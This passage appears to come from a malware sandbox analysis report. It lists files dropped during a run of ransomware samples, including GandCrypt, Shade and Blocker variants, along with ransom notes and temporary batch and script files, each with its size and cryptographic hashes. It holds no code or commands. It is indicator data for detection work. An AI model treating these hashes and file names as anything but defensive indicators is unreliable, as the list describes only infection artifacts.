                    8e9e9dbc19569e7130ab99b66edf7cff5d81c007

                    SHA256

                    195caa8a45a2508604dcb691f8a44e16995c844b5fe17ab7a6952a386a59c4e1

                    SHA512

                    8e34afca638f67818cec3d78043ae3bed5dba66e71908d78e6dcd54b605b61f15f2c486f770b5f7d801d53e3079d2a257f496181b9306e2c541ea6e8a45e000e

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_VelvetRose.gif

                    Filesize

                    15KB

                    MD5

                    1d3578e44821bd6622f2384d27a96a89

                    SHA1

                    25e164801f77ddb707560184c4fc876897c4488f

                    SHA256

                    eeec4c224076224180a692af4c21247e776a5c2f6ca2fa332a3fdac81b21d044

                    SHA512

                    3d2e2a0e06bb597c75956a5e4e8c919f45b0133a626cedb64ec88eb53884b053f7473104fa2965d220bfd68b870b359f26086377dcf8569ddf05620dc7286bc3

                  • C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml

                    Filesize

                    247KB

                    MD5

                    dc400b7cee75f5c8fd9561a732d474d3

                    SHA1

                    db7063448759c5cdd1371a870b4149bbac2fc2f5

                    SHA256

                    2e65dc65c85097ba4d562dfedbdb967358d6ff5b5d503069c5f21ed080e9968d

                    SHA512

                    692d21e16b99c935401dfc781d3a4f8e6aa325b968862eb2231c35e62267f6d33306be4843d99a9870db336c4d53a3b18415241c00a5f51c0475b03ebe674940

                  • C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt

                    Filesize

                    109KB

                    MD5

                    bb13b30c0a78449be80c4f6131bf6568

                    SHA1

                    cdd1aee1e708de337281e8dee387e2cee243cad5

                    SHA256

                    c99abe82ca5c0d3ec12bb736dd630885d289705cb3c2cc0c6d2b95390ea897b1

                    SHA512

                    aaf8d9eafb62d5950b7879f96822e0445e466c05e3115e0550cf2740083f48c11850c3919ff98a7db4f6df2571cac796114de90683667de2c35b36817b6cde8d

                  • C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt

                    Filesize

                    173KB

                    MD5

                    7c89ba7772aeb40dfc3e3b232de653b3

                    SHA1

                    b602b4004ca940089277122fc333d6ff71cbfef5

                    SHA256

                    a46234178c1a446eb5f6e94152e8867703a83f9c08e1d7463dd77f847a0943d5

                    SHA512

                    cf84ed9f4d33fbae8ddd071b8b13bed62fe0189990deb56c2207f79c4c7d4dbb21cb8efc254c8dea4bd07e3736b28d31dc6be479bcee5796c0d5e69ec46010c4

                  • C:\Program Files\Java\jdk1.7.0_80\jre\bin\msvcr100.dll

                    Filesize

                    810KB

                    MD5

                    885ce1d422a09f5d1b4aedf8a9a75a92

                    SHA1

                    e5ac638811376792871bc2d6602827154d3b146b

                    SHA256

                    08fee4a2494f60cfbeb69875a65d734c34379b371cc8f0d4487368585d08f5be

                    SHA512

                    650eb07aa8a57150f1f5293e9c3001edfaf882dba06d9e89b63e6bea64630e57a9a6e03624f0636bef4f86e91d47bcb1d2d65ec5c0dffa2f6064641217a955fa

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA

                    Filesize

                    7KB

                    MD5

                    f23292d63b2de82817ae866a2b958142

                    SHA1

                    c347c2bcec493c2fa4f6e2900a4c7dc0392416c7

                    SHA256

                    36fa262ce0ce9e297e0e6f15c87c9009b3d45a71b92cac5b562f006d0d254c1c

                    SHA512

                    093ab5702a1e3a784c9d32fd81827bdf4a5443afd9660909921305c958092ff0136dd6ea9c8658eeecf23d56443e5416b8ee62cdd1066ee3488a3107c208de41

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt

                    Filesize

                    11KB

                    MD5

                    4db013ee2fd002b2e410e89fad043383

                    SHA1

                    23b95ab96c5d01121e1bd34de9bbcc22137577c5

                    SHA256

                    98e87b32d95611a6a26ffce18e9779ffc5df136df960fdc14b560743750e0df2

                    SHA512

                    51ed224975aa96e8cd0fc09a0a83a36a7fe48b29eb3e7e866424223a8ac868021460f27eac0caddf892841d924f5a292a495c67e91baee5a3f59af0907664c93

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA

                    Filesize

                    7KB

                    MD5

                    d93b8b4d17a5597e7d5b407477e0faa9

                    SHA1

                    41769f4483c3c8014a83f55a54ae234b49969773

                    SHA256

                    6062fcf0fe2c30fbe6e4b080453d52a19be1de580d8007ac33d2e355cadd6fc9

                    SHA512

                    52955d8e1c02a3afbb18394d4c05da5b301335db57f77754ed855ee5aef15131c939add1c9e436e216b5b24baeedd7983cb73981f03718dd0a95f6af3b52a562

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html

                    Filesize

                    12KB

                    MD5

                    7fbaf56b7a668c7e9d2d6f2ebfbe6556

                    SHA1

                    3bd1d0d7c039c76534cacf2569c051966fbacc09

                    SHA256

                    d953d7d98bb5c57caef944cc4f03e147a98fd50ff27f68a0873fd6ecc7e27009

                    SHA512

                    9538bbca02cb705b1609f3a0fda0e48ed13905608a7d5b8bed7f7f02bb3b936b386b376a2ffa87f44577c7be5e17c2f514780e43aac01a6cba22d30cdf730e4a

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html

                    Filesize

                    8KB

                    MD5

                    9b0e98050719a89de81f366bb55697ab

                    SHA1

                    09e2eeb263ffa097e1fa413eac1f5326a9562f82

                    SHA256

                    e295099f54098b4ea8e3e75ff9009ddbddc68889e02c79104ee656b1f9e0f10b

                    SHA512

                    78f0954413c36ec8d0875c63aea30741d6cf53c3eaf76c81efc9d931dc1de241dc08a8d20a69684fb1a30412dfe24e50b29f648ee475dcc364a05985764ac10a

                  • C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi

                    Filesize

                    148KB

                    MD5

                    205c1530c5dae9b448b8c8c7a17efaca

                    SHA1

                    d6418901428a0703f7503d96bede66d84de65846

                    SHA256

                    7f3f63f413b9fc1d42913442de4fe0f2c37225ed65df0e8df87f376ca87df591

                    SHA512

                    c86624fcf2970328a8b0a897d62edf69090b8fdbe5d20a2c7d448597a838c1cb82fd4165a2efc1d8aea28f6bc28be273dc096f59262e0f65cdfb57dc532b16a1

                  • C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                    Filesize

                    120KB

                    MD5

                    fb73795f4e9b22f4d95ff48479ab70cb

                    SHA1

                    9ca3680a2c45060e46f2920a21393ea9ec2f84fd

                    SHA256

                    acdfdc552039fa4b0c9db53b671c5645ed201f9f97bb3b2adb30bf6639379126

                    SHA512

                    82546aeefe83e224ec0bb407a31cfa02a970e2dc194efe2b65c7a8bc2ee119c31f84e4b58d35b5905d451adce0ceb36a7da4390135b5c0de6766554f33d3e40f

                  • C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                    Filesize

                    240KB

                    MD5

                    aa41ebdb2f246d6b6a7561928dc0f8d2

                    SHA1

                    6a99c8461d339ecc450a703b5ca2ab9f394453f2

                    SHA256

                    cfc58e3ac4189ea60a3cdce2ef125d99e179687d12dd6dbd81e293fef10d5536

                    SHA512

                    d436e46384a9478400d326f03c21b2bb7cf76fd837103ecb3d45dae5105560a333b4d3ea8577ce8e14871bed98c123e95572ffeb04e77479a63c2ba2aee025d6

                  • C:\Users\Admin\AppData\Local\Microsoft\Outlook\mapisvc.inf

                    Filesize

                    1KB

                    MD5

                    48dd6cae43ce26b992c35799fcd76898

                    SHA1

                    8e600544df0250da7d634599ce6ee50da11c0355

                    SHA256

                    7bfe1f3691e2b4fb4d61fbf5e9f7782fbe49da1342dbd32201c2cc8e540dbd1a

                    SHA512

                    c1b9322c900f5be0ad166ddcfec9146918fb2589a17607d61490fd816602123f3af310a3e6d98a37d16000d4acbbcd599236f03c3c7f9376aeba7a489b329f31

                  • C:\Users\Admin\AppData\Local\Temp\2796kqsgvsu

                    Filesize

                    221KB

                    MD5

                    6458a93628a22a308c61d8aafa260922

                    SHA1

                    b10cc706b7063809b876d9000bb35e34aa83f3b8

                    SHA256

                    0a9a6dcd92ea82a9b6a5c4338676c24ffded15636c8427ba673a702954494fb9

                    SHA512

                    bddac4b723e4a28f79b67c13646187dee9bc64f035508d48bc086c1ef6a36bd8e6342482eb62be6bc6e507307ca77dc0c7060975548ab6aaeaa3cbfd0a7205d4

                  • C:\Users\Admin\AppData\Local\Temp\CabF23D.tmp

                    Filesize

                    70KB

                    MD5

                    49aebf8cbd62d92ac215b2923fb1b9f5

                    SHA1

                    1723be06719828dda65ad804298d0431f6aff976

                    SHA256

                    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                    SHA512

                    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                  • C:\Users\Admin\AppData\Local\Temp\TarF349.tmp

                    Filesize

                    181KB

                    MD5

                    4ea6026cf93ec6338144661bf1202cd1

                    SHA1

                    a1dec9044f750ad887935a01430bf49322fbdcb7

                    SHA256

                    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                    SHA512

                    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                  • C:\Users\Admin\AppData\Local\Temp\__t7427.tmp.bat

                    Filesize

                    445B

                    MD5

                    32d8f7a3d0c796cee45f64b63c1cca38

                    SHA1

                    d58466430a2bba8641bd92c880557379e25b140c

                    SHA256

                    1a6f73b5c28d1c10f63f2056068c1de61487b8cf8f1dcf7516548df144b3e9ea

                    SHA512

                    288213b92a03ac750ea319bb23c52e7bdf47f5a47ecb70c905c7610a84c63a3ec0a30801b5880e6def8df2c9f577082072e342198d23a19f64e561923e1ef698

                  • C:\Users\Admin\AppData\Local\Temp\aut83B1.tmp

                    Filesize

                    43KB

                    MD5

                    6835491cda09b26ad7098a4d13da97de

                    SHA1

                    89d2bcb55eb452b3a0abf3f08aee8640e91df47d

                    SHA256

                    62f835061c53ed4b0fe384c84c56d67f7d683e94430ffcca1fc3a2def1fc1d49

                    SHA512

                    f4a67839f7de646c502d53fa67ae6e34bc2fdf1b25c648d0f27c86871ee9c078abdbd5d4c6d83be5776a4325c6277bac9f7e76094c93fb5f520f419fd224cedd

                  • C:\Users\Admin\AppData\Local\Temp\f252888.vbs

                    Filesize

                    668B

                    MD5

                    95a7bba664ed9a0977187e9a9ce24e14

                    SHA1

                    adb039fb787b357db3eeaa315095acc59fdeec65

                    SHA256

                    e2e408d8cff36387afe7d10ca25d728461e99a967f20817b0519714f740153b3

                    SHA512

                    f0ea4dce8b2a4b9b111d15a0609eb395d6efe8f7f81ebbe749ca22807b004b9f4e991e18f696c4edc51bd76be8bae1891a83cca5ceddf748ad9f06a6dd84e0df

                  • C:\Users\Admin\AppData\Local\Temp\iLSpLtV.bat

                    Filesize

                    761B

                    MD5

                    c6b266dd0054e23ea4427baefefd762d

                    SHA1

                    cc264765453179cb4c5626bd7d1de83b64e57f98

                    SHA256

                    33226f6746bc0aebab86f0dc6dfacd4c0607f52dbaabb9d5bd838ad490b17ded

                    SHA512

                    20c4331af41d9c98a947f4ebdb3a5addab3a205f60b3e958ede63f9d34f40dcc42fd0360b31a0e39a907864cf5f40d076fda32d0b7aedd341110a67673044986

                  • C:\Users\Admin\AppData\Local\Temp\pLhO8GB.bat

                    Filesize

                    405B

                    MD5

                    52c7d4f16467e3c621fbdf10455fe4c2

                    SHA1

                    b014f1a8d53423d04d242f1b1d7c61cb0d385555

                    SHA256

                    95e4fff2a552bc229fc7b6f7276c934a239463cdd37c371b2c8451153312f2e7

                    SHA512

                    53fbeb0cfc91639557e6f39dc9ff4fd8bdabb149a4131b8c402b3b092ed8d2c59bae6f576175ace8692465c3d563d1c7e896dc67fb2c8a5093d0db5928308de0

                  • C:\Users\Admin\AppData\Local\Temp\teiod.exe

                    Filesize

                    751KB

                    MD5

                    4f43f03783f9789f804dcf9b9474fa6d

                    SHA1

                    492d4a4a74099074e26b5dffd0d15434009ccfd9

                    SHA256

                    19ab44a1343db19741b0e0b06bacce55990b6c8f789815daaf3476e0cc30ebea

                    SHA512

                    645c2f0a1342732b86a45403fb8b1343bcc18c015c9918d2edf118bbb210fead98aa21f1b66ac5faabd0542583d74e158fbac6d5f0d49827f4eeb58c8ebafd6d

                  • C:\Users\Admin\AppData\Local\Temp\tmp1E3C.tmp.bat

                    Filesize

                    351B

                    MD5

                    3cc1d316d6e45fa8831eb3b3836bebb5

                    SHA1

                    86d4a75b3099aa6b614e60f31a8a52089d8701c5

                    SHA256

                    e0a78789bb6c2d58a2bf5900981894afe4ddb284d81428ca538b3b969887869d

                    SHA512

                    785d4c4d7760cbeafcc65b4f5cae8ad693ddaec62aec3f23b06588a7c6830f8f45933a6cb30da0908ef97681afef03377a7219063a48562b42637f3c4003e6b5

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini

                    Filesize

                    87B

                    MD5

                    b2d6dfebf17bd825f5b31fca23a7548e

                    SHA1

                    5305a4abf9af0252fecd9b767139b744e188d861

                    SHA256

                    246010b68ee68ef3d435522f2e62ce03e5515d52868621f3d2f41d1f669021fb

                    SHA512

                    afbc19ff0e9f5da3a90081cea0e131057f8ddafe85507a14e410969b893192d6dadfb7ec59498c1c1cc6a58d4f2f9779937811c57c3203d1d0b69a7be2cadd2c

                  • C:\Users\Admin\AppData\Roaming\s1qoaKDO.tmp

                    Filesize

                    72B

                    MD5

                    94600cac1843d2494ca5b2cc3aaeb653

                    SHA1

                    f11d7a5d92e7fe4d15f8b69d44325559964d4e5c

                    SHA256

                    786c98975ce7dca5ad19e6e72918df020ec2c4501f7fae0c03999d4230d5d8dc

                    SHA512

                    082e34e5f526e26c3125beb8764ff59e9cd4d96a5232df54fff3679410fc85d677fa72d3b34e1d036774f81289528f56097456b59be16a19c6a8861824e2bd4a

                  • C:\Users\Admin\Desktop\!HELP_SOS.hta

                    Filesize

                    99KB

                    MD5

                    d6d08d6e86278ba2600c725877e1421f

                    SHA1

                    368f66df52857324399c7f396647d247a0346aa7

                    SHA256

                    0aa0cb7bae5f345c0e09d66dba46c937133479d6b83e39e96d3d5df253beb992

                    SHA512

                    d893a44846a2bc8c95f51a228876b8a0c187a3da5861a5bcde6c3249edcfb8b4c396d793282d244be4972eb061c17c666e209af3f2155d9a864dbe52cebe6e24

                  • C:\Users\Admin\Desktop\00351\HEUR-Trojan-Ransom.MSIL.Blocker.gen-8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa.exe

                    Filesize

                    1.0MB

                    MD5

                    a6bc42736184b6bed03412a0e4bd9887

                    SHA1

                    ef66c8da6c57973b95089e784090f5b796bba0fd

                    SHA256

                    8b4124c4edcec6b198bf7b21c51f4fe74378cd7013eb257b685b5d01004680fa

                    SHA512

                    ad0d0afc9da22894ded208906052d78e73fb47c176a42b2a0d46885d2ecdfda0b98741ed524c54e3dd3a2cc86ab8f92e32fc82a4273b53c101e545ffc73dcc65

                  • C:\Users\Admin\Desktop\00351\HEUR-Trojan-Ransom.MSIL.GandCrypt.gen-f13e1c0c318f95b1cae88b102f5d02a890d86dac524921ef67c7837d1e916d5c.exe

                    Filesize

                    1.1MB

                    MD5

                    3b68419edc75a61123052b0fdcc6ee91

                    SHA1

                    1ea34642c76f12515cb793a4a568b3e6513d7102

                    SHA256

                    f13e1c0c318f95b1cae88b102f5d02a890d86dac524921ef67c7837d1e916d5c

                    SHA512

                    1fd09061730993bc088535d8dfe4a013b892b1901a0ed7d8443436051f4ebcca48a8f1e1a7e03f0a6a29d7482448401b40aa601d248525804c7d79968e49d6fa

                  • C:\Users\Admin\Desktop\00351\Trojan-Ransom.MSIL.Agent.gox-38f147154c31dfd83a34715aab76173667e18b6671f2e0c0c878b018c2e4f00c.exe

                    Filesize

                    286KB

                    MD5

                    6b23411b04cca289eb80cce4bebceab3

                    SHA1

                    33b91645de1472a11cf002fc908f7239dc5f41df

                    SHA256

                    38f147154c31dfd83a34715aab76173667e18b6671f2e0c0c878b018c2e4f00c

                    SHA512

                    3cbb6f1de4d69d455c8a51de0d6ebbd409965f3a44a33a2446e01d90d44b94fd8779c7df5aeebb796b8b339f7d1a88a36cbeedf120e4157798badd93413812a8

                  • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kpuo-9071d7890a075cf96303d8ff961d8e61deca500d24f295cfc1cbcd98e37a7816.exe

                    Filesize

                    272KB

                    MD5

                    a0129992151a3b73686b303e29a76c45

                    SHA1

                    b55075f0c8b9480c920a9776094402e43d18115f

                    SHA256

                    9071d7890a075cf96303d8ff961d8e61deca500d24f295cfc1cbcd98e37a7816

                    SHA512

                    f954f5ca901d831ae3e354592826e54ac9bd262132e854ea74eaf481b88f03935cec9c9a5c5a74158d90c52db4e3142eb9b194049b5cb04eb13a9b057ea5bd28

                  • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.kwow-d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647.exe

                    Filesize

                    4.9MB

                    MD5

                    f92b82654eca13a854b8ab20d66a5bff

                    SHA1

                    4549a655205d63e02b564cae35d20b03c3c6a6fb

                    SHA256

                    d8f41f560677a87dc582d546e62769e033732bd25c75bf05a93094bf34ddc647

                    SHA512

                    d43db57d2c90a2137f75e3341a85bb84c92b0b83d18000aa0caae3b49944b6ad1adfd04951bb58c77f0f6762b8034ff7a357654b4d2ce8cd08c980ccc88cf127

                  • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.llqn-8d28758e41d57749658cffafebc887020b4e7db4be19e26d6957afb468a8c217.exe

                    Filesize

                    843KB

                    MD5

                    cd68b02b75b54c1b001652aee976ea9c

                    SHA1

                    82c1541a91c4459f14d2f34e6277c799f794a5c6

                    SHA256

                    8d28758e41d57749658cffafebc887020b4e7db4be19e26d6957afb468a8c217

                    SHA512

                    39a1adecd58221a6f4e35616894990a3de0e7bac9603b71b8277615fe231bf51cb8aebae0f48c94de8c080ad0e9a3606eb3e11b72d9cec212da7ad9a517f744a

                  • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Gen.hjl-a58b5f2e8172be31e3d1fcc046d044bd862393f3d3e12922287bedf6f8c18e39.exe

                    Filesize

                    1.8MB

                    MD5

                    104ecbc2746702fa6ecd4562a867e7fb

                    SHA1

                    05cf385b36cf22f10c0cd758d71cdcb228cca2a4

                    SHA256

                    a58b5f2e8172be31e3d1fcc046d044bd862393f3d3e12922287bedf6f8c18e39

                    SHA512

                    02698abb7cbfb0c4596d8b487d9808c3a0746606999892d49d5250412cb96f971b33b8f233e7a1e465b08ddef47fa011ac463085f5247a9ecf5cda9b3c18002f

                  • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Purgen.fk-713b99b925c3cb7357e956e98b25009cdd1aed782f88254d05806a7126935e22.exe

                    Filesize

                    113KB

                    MD5

                    783170ccbea4de7bc971ce4cf7922c0d

                    SHA1

                    b8bdbbcfb89ab7816aa5066c1ddde64192936fc5

                    SHA256

                    713b99b925c3cb7357e956e98b25009cdd1aed782f88254d05806a7126935e22

                    SHA512

                    686f223ca866be2c35bdad4fd933d53b23f761eb43c2160ce91336c424e78aeb40b28cfca018ffe47459598c1a668f5b0744f85da6e7acabe530276023060be1

                  • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.SageCrypt.ddn-b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c.exe

                    Filesize

                    556KB

                    MD5

                    840b42c45e9b428243726b6ccf0e7a03

                    SHA1

                    a4cfd15123d07fcf2c8c4c4deb2cf632deb1e3e2

                    SHA256

                    b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c

                    SHA512

                    5bf2f1c268f0ccbe2f79764adbc79974ffc176f997850030232d310b1660f63c298e62919c2d1327087fdb7b1166128ef8301c7e79de579bf650ce6a474483b6

                  • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Shade.pho-414bb1af4fbb618c4889d69144c7f66591c6e5294d0ab3b7ea8b774946977cf2.exe

                    Filesize

                    1.4MB

                    MD5

                    4c6f64715df65201b347a48ac66d3daa

                    SHA1

                    2c4ff72e0f17af6dad7146a2f9de06e1187e0b69

                    SHA256

                    414bb1af4fbb618c4889d69144c7f66591c6e5294d0ab3b7ea8b774946977cf2

                    SHA512

                    64b3b78a5a22eac66ad73954870e8beb620815735b6c3554c65965c913679d0d78fdc9d5403038101ed1f8a6934cff8377ade62985c839d3ff980a15d1392e6d

                  • C:\Users\Admin\Downloads\!HELP_SOS.hta

                    Filesize

                    99KB

                    MD5

                    d9c45af171af1ab4c7a8d311edb2ee15

                    SHA1

                    84ce41a16a004afcdcd701b9ae00967b0d2ef743

                    SHA256

                    a2c258011afd79770283e16d869cd013118e911eef172f1d5bd19c762df21de4

                    SHA512

                    3d702db4c4754d87e968407c68bbc2cd162e3b5f1a077016165a7d963cc9e74d7cf02d7ab241d64a7dc3a7f58d98cb01e6602a6fd88c3bc71b8f837928557943

                  • C:\Users\Admin\Favorites\链接\京东商城.url

                    Filesize

                    60B

                    MD5

                    45ee65160e3cb47f0311f4b7e849707f

                    SHA1

                    9e6d82d867e253608a4c28a514fafe546af9717a

                    SHA256

                    ba0da86a2e60927d69a122e197d294e6f68229d464a2ded7ee625c80b8d9bf7f

                    SHA512

                    80ea9d88269e1d50a3aed817677981623e4af6de1b806243fd8963a44ec54af7251f248cbba888e0d65950a7ba000527b138a52597ec980a97ff2e121e27f3c0

                  • C:\Users\Admin\Favorites\链接\免费电影.url

                    Filesize

                    60B

                    MD5

                    312596150fc107fca559ff953658d085

                    SHA1

                    d3dc4a642cb6106fa513a3b09f7a3547c0e9af9c

                    SHA256

                    6616a6455cfc6364e1c5183c216189b678e8fc250ebed8b7e7ca76a0ca05c63f

                    SHA512

                    2aeeadb9ef19b1979acd546b2e2f95afbac183f0f30ef5e239f4f8a844cd7c2da6298a60d10a4441adaf08f5daa892c0f3a03fb2c2bb1f7c006efff4b4b2d65d

                  • C:\Users\Admin\Favorites\链接\天猫精选.url

                    Filesize

                    57B

                    MD5

                    28352960bc51bf67ae42318a41f8d854

                    SHA1

                    fe3ef5c1ec01cd4dfe0006bfd5eb92710975c206

                    SHA256

                    73be7f6e83d889b4dfe020edffbe27fb0450a9691a9897dbf619eeb3528e2534

                    SHA512

                    f705474054dcb8b28579c390447abf0beea2d63e70015954b355cfb96ae8c4f3f9cf1900f0bbcf77ff7752ff7738e510a3b41464cc98bcb7cd79484bfa7665c1

                  • C:\Users\Admin\Favorites\链接\小游戏.url

                    Filesize

                    61B

                    MD5

                    f6dc30bef9346c8c58dec7c0d27610dc

                    SHA1

                    4b2909e22c63959c1e002517e5703d405e159c1d

                    SHA256

                    f6a741f1fbd0c65c2aca8d8cb9f4263ea48273b564ccf70bf81b1aa27a568113

                    SHA512

                    0d2bda2e9b20813a7e07b95f99afd0ea5d4f318d9ff9c977bb53f4b9039c1579d4f20b55f4ece72e3cddb95c5a3bf8f8831bf385a05d675319d6e33f77b1c84c

                  • C:\Users\Admin\Favorites\链接\淘宝网.url

                    Filesize

                    58B

                    MD5

                    16b4228b1a50537d01a0edfffae09640

                    SHA1

                    6a1d8b3aa543b08665a2626961b08446d73ce340

                    SHA256

                    f3a4c30bc18df166c10d7f6ab0cd95876f51ef2c78fa636611731b0a3af1694a

                    SHA512

                    0ecb5bda952e50a90fb89ef501febe55841079911272cc721acea9acea8d914e866358e06266ea4ec0ad50de910c935c0a5be1d4af21003d97be3419c45cfd8e

                  • C:\Users\Admin\Favorites\链接\游戏加速.url

                    Filesize

                    56B

                    MD5

                    84cfdc8c3d828ea1827caba7a0460e26

                    SHA1

                    424922a9e79e00aea3fee2f7f25a70f261ff216d

                    SHA256

                    fdfb073210de5f026a8b8e518d21e7fc7812d4220f2872881e897bf9e078676a

                    SHA512

                    6456e91a084b700ca5b3bbf52c8752cae7cde3cb7a6876b2406e3e6bb60de31f8dbe56737d229cb43af21b721839dd0d2be23a4ee6c154c0f04319a7ff2e2a45

                  • C:\Users\Admin\Favorites\链接\百度一下.url

                    Filesize

                    57B

                    MD5

                    cf907c6ebbd5f94e5d8ca7b5bb172e0f

                    SHA1

                    197a1fedb77c52d427fc05a33a8cdff2e2a4ce6b

                    SHA256

                    a4ff88dfa1448c5871457c3be919e17465309c62e607236affe21ff26bbe01ea

                    SHA512

                    2450765f916e3908d5ce8b08ea415857c26e5dfff6c140b4c47ba5f0841ccbdd74bc2eab9b1047c3a82c9ccf845549d92d8d312a88c882225d5ffb5c3ef5d7cc

                  • C:\Users\Admin\Favorites\链接\网址导航.url

                    Filesize

                    58B

                    MD5

                    960845b82ee1674aea14a7bf196aa4e3

                    SHA1

                    3a2b25494524c7dd468475f000bab8922f2727e0

                    SHA256

                    6b6117940fd0827097807d8f0480769d3327db00e7d84418eeb64c2d2fdd1a9e

                    SHA512

                    abfe32b34c3c6274ac6e809d95ce71b9c22b3e1c91fde72f01d834b1b6cde1bed813c81c9d2a952583e1c820b61333b93b356ae4267a8b14ddf74d2b4b819d6a

                  • C:\Users\Admin\Favorites\链接\网页游戏.url

                    Filesize

                    57B

                    MD5

                    b1ebe7a844ad9d3f4979f7da9bb8dc0d

                    SHA1

                    a2ce3e605320d09ca241f6717f8aae7f9fdd07bf

                    SHA256

                    45f857aaad0ccd8e0b89191c88ebeae04d2db04c99a6542c965f0259b8fa71de

                    SHA512

                    a43f410614096dc144b6701d610d7f626a3ba93908caf0cf3b96fe88436c5aa71a835e89fc49e09c18bfcd68ea322cd8a87084171055ffe33f03676fe209235f

                  • C:\Users\Admin\Favorites\链接\美女图片.url

                    Filesize

                    57B

                    MD5

                    46ec266f223b77a33d3b4af4169a0268

                    SHA1

                    405bff4f2a2fca0cb15c1719cb596bb38c47ab27

                    SHA256

                    dca0c42850a48a165ca80e69a851dfff0480154c392f011a549d37765922cfa7

                    SHA512

                    3763c958a37c75c5b83b647c8fa29754d2cfedccd9bfe939df333295833e368eea39321dee2d68aba8b7add3e89ddee80f5c74ede59bc69a025b9a377b7faef8

                  • C:\Users\Public\Videos\RECOVER-FILES.html

                    Filesize

                    4KB

                    MD5

                    7ff4b8f3a04b8761f4aab8f442d7d96b

                    SHA1

                    69e9ce5b8907c9b3c8414c633531a451fdfdaa28

                    SHA256

                    80f3764412cf53b59abf3765b0530978cc8e6d557b8d75b47412b2d443608a8b

                    SHA512

                    76c4ce04f19eba57f90505b5573a1b71503245d9b6f05b9fd4e2564fe07f06acfae4dcca8b70f7a01d9c5c53991a68b558a4dda5f6af04246884385ca59f1f8a

                  • C:\Windows\xk.exe

                    Filesize

                    272KB

                    MD5

                    09369cda8bf691f4231e000aa0ef6955

                    SHA1

                    89b2415a1d0b34870f4313c2a0c56985962ccb84

                    SHA256

                    1613ca737eeb6a19b47967b65fc80f2a10bec326fec0a363566369dc5fcaf16b

                    SHA512

                    a8b9f1a5122df444dba35b0fb42e535487beb3682898ca06a3bbd115dc69a7c168322667cbc4a0c02067d99f22c0d8180b07c1ebab2a048806f658d8fb6d28d7

                  • C:\xk.exe

                    Filesize

                    272KB

                    MD5

                    99c09ec87502d3a02f842fbba0e2469d

                    SHA1

                    7dcd6b6d8d719961c38b6d044aacc7cd0c0ce272

                    SHA256

                    828c8f9731ae687d5ab47efd15ec09adc0688a2f95fa89a0722f83b1d184efc9

                    SHA512

                    a9f0ad86419b2fa0f3ca7b4243372448594889eca00fbe981f954c9c345eec1b3eda99e018834962c61a6d02a07253936fffa0483d0b126f54e584b83576a302

                  • C:\xk.exe

                    Filesize

                    272KB

                    MD5

                    615983470bc5dc68996ef9369052a145

                    SHA1

                    d017c3715da952850274d59948482371f8f93eb1

                    SHA256

                    a0582f7a6302eebeca3120414fa30f54499307e66bee119112d83f49633626e7

                    SHA512

                    902ba55ba4d6cc0e8d3fae379ae3394f7db9edad2042b4232e0583aabf2f4c03c58658256d68347b1a1f02afab2bd9e13b690fe3403bc426c875f25e9465b578

                  • F:\XK\KWNLVP-DECRYPT.txt

                    Filesize

                    8KB

                    MD5

                    6cc4c6acfc8fb3cf5e68b3d6da790b97

                    SHA1

                    e90fdca1187426fda0f66e90ae27e284cbf0b7e2

                    SHA256

                    e71ebbf4e8e320a34b4215b51d669581dfc37cb4b52646bf67ceb75e114223aa

                    SHA512

                    acd9204793be1efedd9fdd78db9fa5d24f1fff6c4b4ba4b5dc306238c07a86e7756c7b1fd2d1bc2f9d5f925f846f1e77e5d83e809e0e6ead13b4b5678b6483d2

                  • \Users\Admin\AppData\Local\Temp\_abp.exe

                    Filesize

                    36KB

                    MD5

                    3c0d740347b0362331c882c2dee96dbf

                    SHA1

                    8350e06f52e5c660bb416b03edb6a5ddc50c3a59

                    SHA256

                    ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85

                    SHA512

